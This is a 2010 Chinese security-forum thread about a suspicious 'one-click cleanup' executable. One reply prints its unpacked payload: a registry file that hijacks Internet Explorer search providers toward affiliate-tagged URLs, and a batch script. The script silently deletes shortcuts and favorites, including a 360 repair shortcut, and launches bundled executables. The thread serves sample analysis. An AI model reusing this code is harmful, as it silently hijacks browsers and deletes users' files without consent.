查看: 4064|回复: 16
收起左侧

[可疑文件] 360独家报,看看是不是病毒

[复制链接]
zmzcy
发表于 2010-8-3 08:37:37 | 显示全部楼层 |阅读模式

HC303
发表于 2010-8-3 08:45:59 | 显示全部楼层
红伞,金山卫士不杀。
jayavira
发表于 2010-8-3 08:46:39 | 显示全部楼层
样本名称:一键清理优化.exe

文件MD5:9d7a8f5305cb5bf88cc288400ffaafd0

鉴定结果:安全
MySince
发表于 2010-8-3 08:47:14 | 显示全部楼层
to Avira
to MSE 2.0
HC303
发表于 2010-8-3 08:47:19 | 显示全部楼层
毒霸云提示安全。
恋亿晓
发表于 2010-8-3 08:47:59 | 显示全部楼层
上报NOD32
ssama
发表于 2010-8-3 08:56:12 | 显示全部楼层
本帖最后由 ssama 于 2010.8.3 09:26 编辑

回复 1楼 zmzcy  的帖子
to avast! & Emsisoft


有恶意行为的说s.reg
  1. Windows Registry Editor Version 5.00
  2. //设置搜索提供商
  3. [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes]
  4. "DefaultScope"="{A481937F-4D99-4B11-86E6-5B0F1007C557}"
  5. "Version"=dword:00000001
  6. "DownloadRetries"=dword:00000000[indent][HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{A481937F-4D99-4B11-86E6-5B0F1007C557}]
  7. "DisplayName"="百度"
  8. "URL"="http://www.baidu.com/s?ie=utf-8&tn=comguge999_dg&wd={searchTerms}"
  9. "ShowSearchSuggestions"=dword:00000001
  10. "SuggestionsURL_JSON"="http://suggestion.baidu.com/su?wd={searchTerms}&action=opensearch&ie=utf-8&from=ie8"
  11. "Codepage"=dword:0000fde9
  12. "OSDFileURL"="http://www.ieaddons.com/cn/DownloadHandler.ashx?ResourceId=857"
  13. "FaviconURL"="http://www.baidu.com/favicon.ico"
  14. "SortIndex"=dword:00000001

  15. [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{A74B9955-EBA2-4088-BB67-929511A48B49}]
  16. "DisplayName"="Google"
  17. "URL"="http://www.google.cn/search?hl=zh-CN&q={searchTerms}&btnG=Google+%E6%90%9C%E7%B4%A2&meta=&aq=f&oq="
  18. "OSDFileURL"="http://www.ieaddons.com/cn/DownloadHandler.ashx?ResourceId=851"
  19. "FaviconURL"="http://www.google.cn/favicon.ico"
  20. "SortIndex"=dword:00000002

  21. [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{DD1ECE7C-8C7B-43EE-9C77-8F356BC3D293}]
  22. "DisplayName"="淘宝闪电搜索"
  23. "URL"="http://search8.taobao.com/browse/search_auction.htm?q={searchTerms}&pid=mm_10532670_0_0&search_type=auction&commend=all&at_topsearch=1"
  24. "ShowSearchSuggestions"=dword:00000001
  25. "SuggestionsURL"="http://search1.taobao.com/browse/search_visual.htm?n=15&q={searchTerms}"
  26. "Codepage"=dword:000003a8
  27. "OSDFileURL"="http://www.ieaddons.com/cn/DownloadHandler.ashx?ResourceId=872"
  28. "FaviconURL"="http://www.taobao.com/favicon.ico"
  29. "SortIndex"=dword:00000003
复制代码
一键清理优化.bat
  1. cls
  2. @echo off//清屏,不显示命令
  3. //根据属性选择要删除的文件。强制删除只读文件。安静模式。删除全局通配符时,不要求确认
  4. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\风行网络电影.*"
  5. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\酷我音乐盒.*"
  6. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\UUSee 网络电视.*"
  7. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\查查看2.0.*"

  8. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\桌面\多特软件站.*"
  9. del /a /f /q "%SystemDrive%\Documents and Settings\All Users\桌面\金山清理专家2009.*"
  10. del /a /f /q "%SystemDrive%\Documents and Settings\All Users\桌面\金山网镖.*"
  11. del /a /f /q "%SystemDrive%\Documents and Settings\All Users\桌面\迅雷看看-免费高清影视.*"
  12. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\桌面\千千音乐.*"
  13. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\桌面\多特软件站.*"
  14. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\桌面\修复360安全卫士.*"
  15. del /a /f /q "%SystemDrive%\Documents and Settings\All Users\桌面\风行游戏.*"

  16. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\「开始」菜单\程序\PPS网络电视\多特知道 电脑答疑.*"
  17. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\「开始」菜单\程序\PPS网络电视\下载软件最新版.*"
  18. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\「开始」菜单\程序\酷狗\多特知道 电脑答疑.*"
  19. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\「开始」菜单\程序\酷狗\下载软件最新版.*"
  20. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\「开始」菜单\程序\Microsoft Office\访问完美者精品下载站.*"

  21. del /a /f /q "D:\我的文档\收藏夹\爱词霸英语学习社区.*"
  22. del /a /f /q "D:\我的文档\Favorites\QQ网址大全.*"
  23. del /a /f /q "D:\我的文档\Favorites\爱词霸英语学习社区.*"
  24. del /a /f /q "D:\我的文档\Favorites\链接\QQ网址大全.*"
  25. del /a /f /q "D:\我的文档\Favorites\金狐电脑工作室-Jinhu Computer Studio.*"
  26. del /a /f /q "D:\我的文档\Favorites\搜索王 - Search All.*"
  27. md "%ProgramFiles%\速达浏览器"
  28. copy "%temp%\一键清理优化\SUDA.EXE" "%ProgramFiles%/速达浏览器/" /y
  29. del /a /f /q "%USERPROFILE%\收藏夹\爱词霸英语学习社区.*"
  30. del /a /f /q "%USERPROFILE%\Favorites\QQ网址大全.*"
  31. del /a /f /q "%USERPROFILE%\Favorites\爱词霸英语学习社区.*"
  32. del /a /f /q "%USERPROFILE%\Favorites\链接\QQ网址大全.*"
  33. del /a /f /q "%USERPROFILE%\Favorites\金狐电脑工作室-Jinhu Computer Studio.*"
  34. del /a /f /q "%USERPROFILE%\Favorites\搜索王 - Search All.*"

  35. del /a /f /q "%ProgramFiles%\FlashGet Network\FlashGet 3\绿色下载吧.*"
  36. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\「开始」菜单\程序\快车 (FlashGet)\访问 自由分享绿色下载吧!.*"

  37. del /a /f /q "%ProgramFiles%\StormII\绿色下载吧.*"
  38. del /a /f /q "%SystemDrive%\Documents and Settings\Administrator\「开始」菜单\程序\暴风影音\访问 自由分享绿色下载吧!.*"

  39. del /a /f /q "%SystemDrive%\WINDOWS\Tasks\SogouImeMgr.job"
  40. //运行s.reg等
  41. regedit /s "%temp%\一键清理优化\s.reg"
  42. "%temp%\一键清理优化\shdoclc.exe"[/indent]exit
复制代码
XMonster
发表于 2010-8-3 13:26:12 | 显示全部楼层
過金山網盾
匆匆九月魂
发表于 2010-8-3 19:23:11 | 显示全部楼层
这些天360误报太厉害了,要不是自己亲身经历过,还真不相信它会误报误杀随便拦截。
hddu
发表于 2010-8-3 19:37:51 | 显示全部楼层
删除"修复360安全卫士"不是毒? 是啥?
360没有误报。360报对了。这是360自卫的行为。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-6-14 17:07 , Processed in 0.159614 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表